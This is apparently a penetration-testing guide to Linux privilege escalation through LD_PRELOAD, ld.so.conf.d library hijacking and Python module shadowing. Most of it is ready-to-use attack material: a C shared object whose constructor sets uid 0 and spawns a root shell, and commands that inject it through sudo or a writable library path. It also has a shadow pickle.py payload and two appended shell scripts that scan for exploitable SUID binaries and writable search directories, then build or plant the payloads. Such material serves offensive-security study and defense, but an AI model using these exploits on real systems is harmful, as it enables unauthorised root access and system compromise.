
Shared Libraries & Interpreter Hijacking

LD_PRELOAD & Shared Library Hijacking

  1. Find Where LD_PRELOAD Is Actually Honored
    ld.so discards LD_PRELOAD (and LD_LIBRARY_PATH) from the environment when it starts a setuid/setgid program, so exporting the variable and running a SUID binary directly gains nothing. The variable is honored when a process that is already root inherits it: the classic case is sudo with env_keep += LD_PRELOAD, which sudo -l reveals. Listing SUID binaries is still useful, because one that needs a library ld.so cannot resolve can be hijacked through the library search path instead:
    find / -perm -4000 -type f 2>/dev/null | while read -r bin; do
      echo "[*] Checking $bin"
      ldd "$bin" 2>/dev/null | grep "not found" && echo "[+] $bin has an unresolved library"
    done
    
  2. Create a Malicious Shared Object
    // exploit.c
    #include <stdlib.h>   // system(), unsetenv()
    #include <unistd.h>   // setuid(), setgid()

    // Constructors run when ld.so maps the library, before the target's main().
    void __attribute__((constructor)) init(void) {
        unsetenv("LD_PRELOAD");  // otherwise the spawned shell preloads us again
        setgid(0);               // set the real ids to 0 as well, or bash drops the euid
        setuid(0);
        system("/bin/sh");
    }
    
    gcc -shared -fPIC -o /tmp/exploit.so exploit.c
    
  3. Inject Through a Privileged Process That Keeps the Variable
    export LD_PRELOAD=/tmp/exploit.so
    /path/to/suid_binary                                      # ld.so drops LD_PRELOAD here: nothing happens
    sudo LD_PRELOAD=/tmp/exploit.so /path/to/allowed_binary   # works when sudo -l shows env_keep+=LD_PRELOAD
    
  4. The constructor fires as soon as ld.so maps exploit.so, before the target's main(), so any dynamically linked program is a valid carrier; you get root only because the process that loads it is already running with euid 0 (for example under sudo), not because it happens to load libc.
  5. Modify /etc/ld.so.conf.d if Writable
    echo "/home/user/mylibs" > /etc/ld.so.conf.d/malicious.conf
    ldconfig
    
  6. Place a .so carrying the exact soname the target requests (check ldd or readelf -d) in /home/user/mylibs and run the vulnerable binary. ld.so consults /etc/ld.so.cache after DT_RPATH, LD_LIBRARY_PATH and DT_RUNPATH but before /lib and /usr/lib, so a library that ldd reports as "not found" is the cleanest target. Rewriting the cache requires ldconfig to run as root, so besides the writable directory you need a root-run ldconfig (sudo rule, cron job, package hook) to pick the entry up.
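The following triage script is an added example for the LD_PRELOAD and ld.so.conf.d steps above; it is not the page's own code. It checks the three things that actually decide whether this technique yields root: whether sudo keeps LD_PRELOAD or LD_LIBRARY_PATH (from sudo -l output), which SUID binaries have a library ld.so cannot resolve (from ldd output), and which directories named in ld.so.conf fragments are writable. It also builds the fixed preload library. The function names, the --scan flag and paths such as /tmp/exploit.so are assumptions made for this example.

```shell
#!/bin/sh
# Added triage script for the steps above (not the page's own code).
# ld.so ignores LD_PRELOAD and LD_LIBRARY_PATH taken from the environment when
# it starts a setuid/setgid program, so the cases that actually give root are:
#   (a) sudo keeps one of those variables (env_keep) for a command we may run;
#   (b) a privileged program needs a library ld.so cannot find, or resolves one
#       through a directory we can write to (ld.so.conf.d hijack).
# Function names, the --scan flag and paths such as /tmp/exploit.so are
# assumptions for this example.

# (a) Succeeds when `sudo -l` output ($1) shows LD_PRELOAD or LD_LIBRARY_PATH
#     being kept. Handles both env_keep=LD_PRELOAD and env_keep+="A B" forms.
sudo_keeps_ld_env() {
    printf '%s\n' "$1" |
        grep -qE 'env_keep\+?="?[^,"]*LD_(PRELOAD|LIBRARY_PATH)'
}

# (b) Prints libraries that `ldd` output ($1) reports as "=> not found".
missing_libs() {
    printf '%s\n' "$1" |
        awk '$2 == "=>" && $3 == "not" && $4 == "found" { print $1 }'
}

# Prints directories named in the ld.so.conf fragments ($@) that we can write
# to; a same-named .so placed there is picked up the next time root runs ldconfig.
writable_ld_dirs() {
    cat "$@" 2>/dev/null | grep -v '^[[:space:]]*#' | grep -v '^include' |
        while IFS= read -r d; do
            [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
        done
    return 0
}

# Writes and builds the preload library: the page's payload plus the header it
# needs, unsetenv so the child shell is not preloaded again, and gid before uid.
build_preload_so() {
    out=${1:-/tmp/exploit.so}
    work=$(mktemp -d)
    cat > "$work/exploit.c" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
void __attribute__((constructor)) init(void) {
    unsetenv("LD_PRELOAD");   /* do not preload ourselves into the shell */
    setgid(0);
    setuid(0);                /* real ids 0 too, or bash drops the euid */
    system("/bin/sh");
}
EOF
    gcc -shared -fPIC -o "$out" "$work/exploit.c" && printf '%s\n' "$out"
}

# The live scan runs only on request, so sourcing this file for its functions
# (or running it without arguments) touches nothing on the host.
if [ "${1:-}" = "--scan" ]; then
    if sudo_keeps_ld_env "$(sudo -n -l 2>/dev/null)"; then
        echo "[+] sudo keeps LD_PRELOAD/LD_LIBRARY_PATH: try sudo LD_PRELOAD=/tmp/exploit.so <allowed command>"
    fi
    find / -perm -4000 -type f 2>/dev/null | while IFS= read -r bin; do
        libs=$(missing_libs "$(ldd "$bin" 2>/dev/null)")
        [ -n "$libs" ] && echo "[+] $bin needs missing library: $libs"
    done
    writable_ld_dirs /etc/ld.so.conf /etc/ld.so.conf.d/*.conf |
        sed 's/^/[+] writable ld.so.conf directory: /'
    [ -w /etc/ld.so.conf.d ] && echo "[+] /etc/ld.so.conf.d is writable (still needs ldconfig run as root)"
fi
```

Run it as `sh ldpreload_triage.sh --scan` on the target; without the flag it only defines the functions, which is what a pipeline that sources it for `missing_libs` or `writable_ld_dirs` wants. A hit from `sudo_keeps_ld_env` is the only case where the page's `export LD_PRELOAD` approach works; a hit from `missing_libs` points at the search-path route instead.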

Python Module Hijacking

  1. Locate Python Scripts That Run With Privilege
    find / -perm -4000 -type f 2>/dev/null | grep "\.py$"
    The kernel ignores the setuid bit on interpreted scripts, so a hit here only matters if a setuid wrapper, a sudo rule or a cron job actually runs the script as root; sudo -l and /etc/cron* are where to look for those.
    
  2. Create a Malicious Python Module
    mkdir -p /tmp/malicious
    cat << 'EOF' > /tmp/malicious/pickle.py
    # The module body runs at import time, which is all a shadow module needs.
    import os
    os.setuid(0)            # raises PermissionError unless we are already euid 0
    os.system("/bin/sh")
    EOF
    
  3. Set PYTHONPATH and Run the Script
    export PYTHONPATH=/tmp/malicious:$PYTHONPATH
    /usr/bin/vulnerable_suid_script.py
    
  4. Python walks sys.path in order: the script's own directory first, then the PYTHONPATH entries, then the standard library. If vulnerable_suid_script.py does import pickle (or any other module you can shadow; modules compiled into the interpreter such as sys and builtins cannot be, and on Python 3.11+ neither can frozen ones such as os), the shadow module's body runs at import time and spawns a root shell. Two caveats: sudo's default env_reset strips PYTHONPATH unless sudo -l shows env_keep += PYTHONPATH, and a writable script directory is the stronger target anyway, since it is sys.path[0] and needs no environment variable at all (Python 3.11+ can disable that entry with -P or PYTHONSAFEPATH).
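The following helper is an added example for the Python steps above and is not the page's own code. Given a script that root will run, it extracts the top-level modules the script imports, lists the search directories ahead of the standard library (the script's own directory and the PYTHONPATH entries) that the current user can write to, pairs the two into concrete shadow-module paths, and can drop the page's payload into one of them. The function names, the --scan flag and the sample script path are assumptions made for this example.

```shell
#!/bin/sh
# Added helper for the Python steps above (not the page's own code). Given a
# script that root will run (sudo rule, cron job or setuid wrapper), list the
# modules it imports and the directories Python searches *before* the standard
# library that we can write to: sys.path[0] is the script's own directory, then
# the PYTHONPATH entries. A writable one of those lets us shadow any import that
# is not compiled or frozen into the interpreter. Names and paths are assumptions.

# Print the top-level names imported by script $1, one per line, sorted/unique.
# Handles "import a.b as c, d" and "from x.y import z" (giving a, d and x).
script_imports() {
    grep -E '^[[:space:]]*(import|from)[[:space:]]' "$1" |
        sed -E 's/^[[:space:]]*from[[:space:]]+([A-Za-z_][A-Za-z0-9_.]*)[[:space:]]+import.*/\1/' |
        sed -E 's/^[[:space:]]*import[[:space:]]+//' |
        tr ',' '\n' |
        sed -E 's/^[[:space:]]+//; s/[[:space:]]+as[[:space:]].*$//; s/[[:space:]]+$//; s/\..*$//' |
        grep -E '^[A-Za-z_][A-Za-z0-9_]*$' |
        sort -u
}

# Print the directories searched before the stdlib that we can write to:
# $1 = script path, $2 = the PYTHONPATH value the privileged run will see.
writable_search_dirs() {
    {
        dirname "$1"                       # sys.path[0]
        printf '%s\n' "$2" | tr ':' '\n'   # then PYTHONPATH, in order
    } | awk 'NF && !seen[$0]++' | while IFS= read -r d; do
        [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
    done
    return 0
}

# Drop a shadow module named $2 into directory $1. Same payload as the page's
# pickle.py; the euid check keeps it silent if a non-root process imports it first.
plant_shadow_module() {
    cat > "$1/$2.py" <<'EOF'
import os
if os.geteuid() == 0:
    os.setuid(0)            # real uid 0 as well, or the shell drops privileges
    os.system("/bin/sh")
EOF
    printf '%s\n' "$1/$2.py"
}

# For script $1 under PYTHONPATH $2, print "<dir>/<module>.py shadows <module>"
# for every writable search directory and every shadowable import.
hijack_candidates() {
    dirs=$(writable_search_dirs "$1" "$2")
    [ -n "$dirs" ] || return 0
    script_imports "$1" | while IFS= read -r mod; do
        case "$mod" in
            sys|builtins|posix|marshal|_io|_thread) continue ;;   # compiled in: not shadowable
            os|io|abc|site|stat|codecs) continue ;;               # frozen in since Python 3.11
        esac
        printf '%s\n' "$dirs" | while IFS= read -r d; do
            printf '%s/%s.py shadows %s\n' "$d" "$mod" "$mod"
        done
    done
    return 0
}

# Usage: sh pyhijack.sh --scan /usr/bin/vulnerable_suid_script.py
if [ "${1:-}" = "--scan" ] && [ -n "${2:-}" ]; then
    hijack_candidates "$2" "${PYTHONPATH:-}"
fi
```

Pass the PYTHONPATH the privileged run will actually see, not your own: for a sudo-run script that is empty unless env_keep preserves it, which is why the script directory (sys.path[0]) is usually the only candidate the scan prints. Remove the frozen-module exclusions if the target interpreter is older than 3.11.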